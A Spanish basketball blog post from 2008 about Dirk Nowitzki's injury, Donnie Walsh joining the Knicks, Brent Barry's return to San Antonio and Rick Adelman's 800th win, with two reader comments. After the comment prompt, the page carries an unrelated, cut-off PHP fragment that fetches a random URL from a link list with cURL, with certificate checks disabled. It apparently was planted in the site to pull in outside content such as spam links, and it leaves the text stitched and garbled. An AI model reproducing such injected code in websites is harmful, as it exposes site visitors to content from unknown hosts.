Terremoto en Dallas

25 de March de 2008 por Gallis

Malas, muy malas noticias las que llegan desde Dallas. Dirk Nowitzki es baja indefinida, tras serle diagnosticado un esguince moderadamente alto en su tobillo izquierdo y un esguince de grado medio en su rodilla izquierda. Todo ocurrió este domingo en el partido que enfrentó a los Mavs y a los Spurs. Quedaban 3:18 para acabar el tercer cuarto y el alemán cayó muy mal tras intentar taponar un tiro de Ime Udoka. Nada más finalizar el partido, el dueño de los Mavs, Mark Cuban, aseguró que Nowitzki estaría al menos 2 semanas de baja. Una vez realizadas las pruebas todo parece indicar que si se cumple ese pronóstico serán buenas noticias para los tejanos. En cualquier caso, esta lesión complica mucho el camino de Dallas (44-26, séptimos en el oeste) hacía los Playoffs, ya que en esas dos semanas los chicos de Avery Johnson tienen enfrentamientos contra rivales directos, como Golden State Warriors o Denver Nuggetts, actualmente novenos a un partido y medio de los Mavs. Además, Dallas visitará los siempre complicados campos de los Phoenix Suns y Los Angeles Lakers, difícil calendario más teniendo en cuenta que desde que llegó Jason Kidd a Dallas, el equipo lleva un récord de 0-8 frente a equipos con más de un 50% de victorias.

La lesión de Nowitzki empaña otra de las noticias más importantes de la temporada. Y es que todo parece indicar que Donnie Walsh, hasta ahora jefe ejecutivo de los Indiana Pacers, será el presidente ejecutivo de los New York Knicks los próximos 3 años, período en el que cobrará unos 15 millones de dólares. Walsh, de 67 años de edad, deja los Pacers tras 24 años en la franquicia de Indianapolis. La principal duda tras conocer la noticia radica ahora en el futuro de Isiah Thomas. El ex base de los Pistons compagina esta temporada el puesto que ocupará Walsh con el de entrenador. Falta saber si continuará o no en ese segundo trabajo. Se da la curiosa circunstancia de Walsh ya contó con Thomas como entrenador en Indiana, al contratarle en la temporada 2000/01. Lo que sí parece confirmar este movimiento es la permanencia de Larry Bird en Indiana, asumiendo plenos poderes tras la marcha de su actual jefe.

En otro orden de cosas, también se ha confirmado un fichaje anunciado. Una vez que ha concluido el período obligatorio de 30 días de espera, Brent Barry es, de nuevo, jugador de los San Antonio Spurs. Barry fue traspasado a los Seattle Supersonics el pasado mes de febrero junto a Francisco Elson a cambio de Kurt Thomas. Un día después Barry fue cortado y tras cumplirse el plazo legalmente establecido, regresa al equipo al que pertenecía desde 2004. Antes del traspaso, Barry promediaba esta temporada 7.3 puntos en 29 partidos.

Para acabar, otra lesión y un récord. Charlie Bell, jugador de Milwaukee Bucks será baja unas 2 semanas con problemas en los ligamentos de su rodilla derecha. Mientras, Rick Adelman, entrenador de los Houston Rockets, se convirtió anoche en el decimotercer entrenador de la historia (sexto en activo) en alcanzar la cifra de 800 victorias. Lo consiguió en la victoria de los Rockets frente a uno de sus ex equipos, los Kings, por 100-108. Adelman es, además, el cuarto entrenador con mejor porcentaje de victorias entre entrenadores que hayan dirigido, al menos, 1000 partidos. Adelman ha ganado 61.3% de los partidos que ha entrenado. Le preceden en esta lista, ni más ni menos, Phil Jackson, Red Auerbach y Pat Riley.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Quién sabe, igual esto sirve para que Kidd asuma más responsabilidad, tome las riedas, y se ponga a rendir al máximo.

    Aunque la pinta de los Mavs es terrible, de mal en peor.

    Me alegro por Cuban, jeje.

      Citar

  2. Jabho dice:
    #2

    Pues si que pintan mal los Mavs…. Si se quedan fuera o cogen un mal cruce y caen en primera ronda tocan cambios profundos. Final perdida hace dos años, desastre del año pasado y temporada discretita que se estan marcando…. Mal camino.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>